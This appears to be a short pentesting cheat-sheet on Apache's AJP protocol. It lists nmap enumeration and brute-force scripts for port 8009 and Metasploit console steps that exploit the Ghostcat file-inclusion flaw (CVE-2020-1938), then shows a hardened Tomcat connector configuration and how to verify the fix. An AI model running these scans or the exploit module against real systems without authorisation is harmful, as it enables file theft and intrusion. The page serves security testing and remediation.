# AJP (Apache JServ Protocol) Pentesting

AJP is a binary protocol that lets a front-end web server proxy inbound requests to an application server sitting behind it. The default port is 8009.

### Enumeration <a href="#enumeration" id="enumeration"></a>

```
nmap --script ajp-auth -p 8009 <target-ip>
nmap --script ajp-auth --script-args ajp-auth.path=/login -p 8009 <target-ip>
nmap --script ajp-brute -p 8009 <target-ip>
nmap --script ajp-headers -p 8009 <target-ip>
nmap --script ajp-methods -p 8009 <target-ip>
nmap --script ajp-request -p 8009 <target-ip>
```

### Ghostcat File Inclusion <a href="#ghostcat-file-inclusion" id="ghostcat-file-inclusion"></a>

It's a vulnerability in the **Tomcat AJP** connector ([CVE-2020-1938](https://www.exploit-db.com/exploits/49039)).\
Use Metasploit to exploit it.

```
msfconsole
msf6 > use auxiliary/admin/http/tomcat_ghostcat
msf6 auxiliary(admin/http/tomcat_ghostcat) > set rhosts <target-ip>
msf6 auxiliary(admin/http/tomcat_ghostcat) > exploit
```
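On the remediation side, the exposure comes down to how the AJP connector is declared in Tomcat's `conf/server.xml`. The fragment below is an added example, not part of the original page or of Tomcat's shipped configuration: it shows the older default (connector enabled, listening on all interfaces, no shared secret) beside a hardened form using the `address`, `secretRequired` and `secret` attributes that Tomcat introduced with the Ghostcat fix. The secret value is a placeholder to be replaced.

```xml
<!-- Weak (pre-fix default): AJP enabled, bound to every interface, no secret.
     Anything that can reach 8009/tcp can speak AJP to Tomcat directly. -->
<Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />

<!-- Hardened form, used only when a reverse proxy actually needs AJP:
     - address: listen on loopback so only a local front end can connect
     - secretRequired/secret: reject AJP requests that do not carry the shared secret -->
<Connector port="8009" protocol="AJP/1.3"
           address="127.0.0.1"
           secretRequired="true"
           secret="REPLACE-WITH-A-LONG-RANDOM-SECRET"
           redirectPort="8443" />

<!-- If no front end uses AJP at all, the safest option is to leave the
     connector commented out (as current Tomcat releases ship it) and serve HTTP only. -->
```

The front-end proxy must present the same secret; with Apache httpd's `mod_proxy_ajp` that is the `secret=` parameter on the `ProxyPass` line. After the change, confirm that port 8009 is no longer bound on a non-loopback address and re-run the `ajp-*` nmap scripts above from outside the host to verify they no longer get a response.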
